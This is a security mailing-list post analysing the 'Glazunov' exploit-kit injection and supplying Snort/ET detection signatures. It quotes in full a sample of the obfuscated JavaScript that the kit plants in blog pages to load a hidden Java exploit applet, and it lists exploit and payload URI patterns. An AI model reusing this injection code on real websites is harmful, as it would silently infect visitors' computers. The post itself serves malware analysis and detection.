[Emerging-Sigs] "Glazunov" injection update

Chris Wakelin c.d.wakelin at reading.ac.uk
Thu Nov 22 06:43:09 HAST 2012

I've just had a client compromised via Java from our old friend
"Glazunov" (my name based on the hosting provider on I originally saw
the exploit files - anybody with a better name please say!).

This is the kit that inserts malicious, randomly-obfuscated javascript
into web-pages (typically blogs) that points to one-time-only,
shortlived randomised URLs for a Java exploit and its payload.
Subsequent requests from the same IP do not see the injection (I'm
guessing its using a rogue Wordpress plugin or Apache module).

The payload URI is literally encrypted using a key in the Java exploit
jar, using the same method as the kit I've been calling "Sibhost" (see

Previously, the Java exploit URI would be four random digits, and the
payload URI would be a different four digits plus "1" at the end.

Now, it appears to be five random digits for the payload, and ten random
digits "/" five random digits for the exploit, e.g.: /4526020630/17108 /18012 /1680107170/66021 /12022 /6183807484/23919 /14892

The injected Javascript looks like (function and variable names and the
charcode displacement will vary as well as the encoded URIs):

> <body class="page-work"><body><script language="javascript"> var ws=new Date(); ws.setDate(12+ws.getDate()); document.cookie="stats=446501053769c06c565094b26d26e8ef; path=/; expires="+ ws.toGMTString(); gbt=4*1; nwf="lxxt>33"; </script><script language="javascript">var lktjt = function(gqnbwws){var jse = function(vni)
> {var kow, yaw, i; var qxt=""; kow = vni.length; for (i = 0; i < kow; ++i) {yaw = vni.charCodeAt(i)-gbt;qxt = qxt + String.fromCharCode(yaw);} return(qxt); }
> var cqwhc=document.createElement(jse("ettpix"));cqwhc.setAttribute(jse("gshi"), jse("lujfl}pgf2r}yihov}qetpzkqnjz2gpeww"));cqwhc.setAttribute(jse("evglmzi"), " "+jse(nwf+"64<2<;268525:9><4<435:<454;5;43::465"));cqwhc.setAttribute(jse("{mhxl"), "1");cqwhc.setAttribute(jse("limklx"), "1");var xwdjbp=document.createElement(jse("teveq"));xwdjbp.setAttribute(jse("reqi"),jse("k{itpv"));xwdjbp.setAttribute(jse("zepyi"),jse("h=66hh4=75e67h8h<h6446h4;6e<g66=j6h77h9f9j4eh4h49h9h664h64f48h"));cqwhc.appendChild(xwdjbp);document.body.appendChild(cqwhc); } ;
> lktjt(1);</script></body>

Here's an update to the ET sig:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET CURRENT_EVENTS
probable malicious Glazunov Javascript injection";
flow:established,from_server; content:"(|22|"; content:"|22|))|3b|";
distance:64; within:68; content:")|3b|</script></body>"; within:200;
fast_pattern; flowbits:set,et.exploitkitlanding; classtype:bad-unknown;
sid:2014753; rev:3;)

and two more sigs to match the Java requests (I'm not 100% sure of the
performance, but I've been running versions of these to match the old
URIs for quite a while, albeit with no recent hits).

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS
Possible Glazunov Java exploit request /10-/5-digit";
flow:established,to_server; content:"|29 20|Java/"; http_header;
urilen:17; pcre:"/^\/\d{10}\/\d{5}$/U";
flowbits:set,et.exploitkitlanding; classtype:trojan-activity; sid:xxxx;

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET CURRENT_EVENTS
Possible Glazunov Java payload request /5-digit";
flow:established,to_server; content:"|29 20|Java/"; http_header;
urilen:6; pcre:"/^\/\d{5}$/U"; flowbits:set,et.exploitkitlanding;
classtype:trojan-activity; sid:xxxx; rev:1;)

Best Wishes,

Christopher Wakelin,                           c.d.wakelin at reading.ac.uk
IT Services Centre, The University of Reading,  Tel: +44 (0)118 378 2908
Whiteknights, Reading, RG6 6AF, UK              Fax: +44 (0)118 975 3094

More information about the Emerging-sigs mailing list